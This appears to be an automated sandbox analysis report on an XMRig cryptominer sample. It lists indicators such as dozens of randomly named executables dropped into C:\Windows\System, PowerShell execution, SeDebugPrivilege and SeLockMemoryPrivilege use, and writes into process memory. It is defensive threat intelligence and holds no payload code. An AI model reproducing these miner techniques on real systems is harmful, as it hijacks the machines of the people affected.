Malware Analysis Report

2024-09-10 20:17

Sample ID 240613-3pgl5azblq
Target 90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe
SHA256 ab356445e4d64b1361f750c2efc39420d23541b735c598e67cb44731f8fa8211
Tags
miner upx xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ab356445e4d64b1361f750c2efc39420d23541b735c598e67cb44731f8fa8211

Threat Level: Known bad

The file 90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution

xmrig

Xmrig family

XMRig Miner payload

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

UPX packed file

Executes dropped EXE

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-13 23:41

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 23:41

Reported

2024-06-13 23:43

Platform

win7-20240508-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\RFjOCyb.exe N/A
N/A N/A C:\Windows\System\rlqTeyb.exe N/A
N/A N/A C:\Windows\System\XCjvrMk.exe N/A
N/A N/A C:\Windows\System\BzzzXmL.exe N/A
N/A N/A C:\Windows\System\SxzuejO.exe N/A
N/A N/A C:\Windows\System\IuyWWCD.exe N/A
N/A N/A C:\Windows\System\EAOnrIk.exe N/A
N/A N/A C:\Windows\System\GUdFGvu.exe N/A
N/A N/A C:\Windows\System\OyhyBtt.exe N/A
N/A N/A C:\Windows\System\ocWCgUC.exe N/A
N/A N/A C:\Windows\System\HADKonB.exe N/A
N/A N/A C:\Windows\System\NROggnf.exe N/A
N/A N/A C:\Windows\System\AxENnFt.exe N/A
N/A N/A C:\Windows\System\WtoRDXP.exe N/A
N/A N/A C:\Windows\System\riyahnI.exe N/A
N/A N/A C:\Windows\System\Szjcmbf.exe N/A
N/A N/A C:\Windows\System\BZxAsES.exe N/A
N/A N/A C:\Windows\System\YpEGkDe.exe N/A
N/A N/A C:\Windows\System\JbXvWVu.exe N/A
N/A N/A C:\Windows\System\qcgcnae.exe N/A
N/A N/A C:\Windows\System\sTwGySl.exe N/A
N/A N/A C:\Windows\System\pSjaQFX.exe N/A
N/A N/A C:\Windows\System\kzXuSYy.exe N/A
N/A N/A C:\Windows\System\JxOTmGq.exe N/A
N/A N/A C:\Windows\System\asziuZD.exe N/A
N/A N/A C:\Windows\System\JalxMOi.exe N/A
N/A N/A C:\Windows\System\aNDliJj.exe N/A
N/A N/A C:\Windows\System\XJnhyfE.exe N/A
N/A N/A C:\Windows\System\RkFbpYU.exe N/A
N/A N/A C:\Windows\System\rGfomqn.exe N/A
N/A N/A C:\Windows\System\BhbXRGX.exe N/A
N/A N/A C:\Windows\System\fvSFAVv.exe N/A
N/A N/A C:\Windows\System\nfYcIpm.exe N/A
N/A N/A C:\Windows\System\PZCgIeT.exe N/A
N/A N/A C:\Windows\System\rPZtbUL.exe N/A
N/A N/A C:\Windows\System\DNTdqcy.exe N/A
N/A N/A C:\Windows\System\yjVKhdt.exe N/A
N/A N/A C:\Windows\System\cbMAJAl.exe N/A
N/A N/A C:\Windows\System\TgtenWJ.exe N/A
N/A N/A C:\Windows\System\BvcpvjM.exe N/A
N/A N/A C:\Windows\System\PwFqYSl.exe N/A
N/A N/A C:\Windows\System\pFOCMaG.exe N/A
N/A N/A C:\Windows\System\meXIGLB.exe N/A
N/A N/A C:\Windows\System\pSuJpCv.exe N/A
N/A N/A C:\Windows\System\cNspEcS.exe N/A
N/A N/A C:\Windows\System\XVDtBqU.exe N/A
N/A N/A C:\Windows\System\vQZFUEV.exe N/A
N/A N/A C:\Windows\System\hOXVyqk.exe N/A
N/A N/A C:\Windows\System\BKCjsLF.exe N/A
N/A N/A C:\Windows\System\xtnTUip.exe N/A
N/A N/A C:\Windows\System\ofryXuD.exe N/A
N/A N/A C:\Windows\System\QPEqhBX.exe N/A
N/A N/A C:\Windows\System\tiMwXRT.exe N/A
N/A N/A C:\Windows\System\iqmuueU.exe N/A
N/A N/A C:\Windows\System\IiROLBt.exe N/A
N/A N/A C:\Windows\System\CApnmzV.exe N/A
N/A N/A C:\Windows\System\DbfNQYv.exe N/A
N/A N/A C:\Windows\System\UFahoPr.exe N/A
N/A N/A C:\Windows\System\vCzatNF.exe N/A
N/A N/A C:\Windows\System\ebfRRPQ.exe N/A
N/A N/A C:\Windows\System\uliLyEd.exe N/A
N/A N/A C:\Windows\System\JZUKLRC.exe N/A
N/A N/A C:\Windows\System\FqOHSfg.exe N/A
N/A N/A C:\Windows\System\hCUKVNi.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\desNCuo.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\RQDsxbc.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\DnPOSlZ.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\RWpjguF.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\daRDKSh.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\kpUjfTt.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\jrfrutH.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\sYTcSbh.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\yEbeIGA.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\kTwUJlO.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\jgmLfNv.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\yqTZOzU.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\KcoClDC.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\MCawYGM.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\qyZKzOd.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\DbzjIwh.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\hsWHrZC.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\aOSNdSc.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\lsdfvod.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\LoLvduE.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\bYeCIaP.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\TSlcmRp.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\PSmXWLb.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\XVjDpuc.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\yybCwZR.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\CZlPKxO.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\vZDwdQs.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\myecwez.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\eFVAtsw.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\MfcRIMC.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\CLbhucw.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\EJCLsoM.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\MQGPVKK.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\fbjpbCR.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\aXxoRex.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\yjrusRG.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\bBCwmMJ.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\vvUShOF.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZswOMhQ.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\SLXBoKH.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\cyhWveS.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\RpyErQo.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\RVphVzM.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\SgmpgWY.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\kZQczRQ.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\aIQRsZC.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\gTXidQg.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\SvAsvVG.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\Avlzwgc.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZylDIXV.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\XInbCdd.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\qBGyAeS.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\YFDTqWV.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\amjYpGd.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\QqPUlyF.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\rkvvbIz.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\cNYjBZP.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\VLNnDty.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\SVzXoMI.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\RgMWZBl.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\qCvjTDi.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\hAkNjfk.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\gYZzYhz.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\fRpxOaq.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2244 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2244 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2244 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2244 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\RFjOCyb.exe
PID 2244 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\RFjOCyb.exe
PID 2244 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\RFjOCyb.exe
